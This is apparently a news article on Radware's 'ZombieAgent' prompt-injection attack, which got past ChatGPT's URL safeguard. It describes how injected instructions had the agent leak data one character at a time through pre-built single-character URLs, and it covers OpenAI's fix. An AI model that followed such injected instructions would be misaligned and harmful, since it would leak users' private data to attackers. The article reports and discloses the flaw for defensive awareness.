Technology

ChatGPT’s Ongoing Battle: New ‘ZombieAgent’ Attack Bypasses URL Safeguards

Radware researchers uncover a method to exfiltrate data from ChatGPT, highlighting the persistent challenge of prompt injection vulnerabilities despite OpenAI's mitigations.

Scott Adams works as part of the editorial team at Nile1, contributing to the preparation and editing of news content in accordance with the website’s editorial policy and based on verified sources and internal editorial review prior to publication. The published content reflects the editorial stance of the website and does not necessarily represent a personal opinion.

OpenAI implemented a strict URL policy for ChatGPT, allowing it to open only exact links and preventing the addition of parameters. This measure successfully countered ShadowLeak, an attack that exploited the large language model’s ability to create new URLs by combining words, appending query parameters, or inserting user data.

However, Radware researchers devised ZombieAgent, a straightforward modification to the prompt injection technique. Their method involved providing a comprehensive list of pre-constructed URLs, each appending a single character—a letter (e.g., example.com/a, example.com/b) or a number (example.com/0 through example.com/9)—to a base URL. The prompt also directed the agent to replace spaces with a specific token.

Diagram illustrating the URL-based character exfiltration for bypassing the allow list introduced in ChatGPT in response to ShadowLeak.
Credit: Radware

ZombieAgent succeeded because OpenAI’s restrictions did not prevent the appending of a single character to a URL. This oversight enabled the attack to exfiltrate data one character at a time.

OpenAI has since addressed ZombieAgent by limiting ChatGPT’s ability to open links from emails. The model now only opens such links if they are listed in a public index or explicitly provided by the user within a chat prompt. This adjustment aims to prevent the agent from accessing base URLs controlled by attackers.

OpenAI’s experience reflects a common challenge in cybersecurity: the continuous cycle of mitigating an attack only for it to reappear with minor alterations. This pattern, reminiscent of persistent threats like SQL injection and memory corruption vulnerabilities, is expected to continue indefinitely, providing attackers with ongoing opportunities to compromise software and websites.

Pascal Geenens, VP of threat intelligence at Radware, emphasized that “Guardrails should not be considered fundamental solutions for the prompt injection problems.” He added, “Instead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.”

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button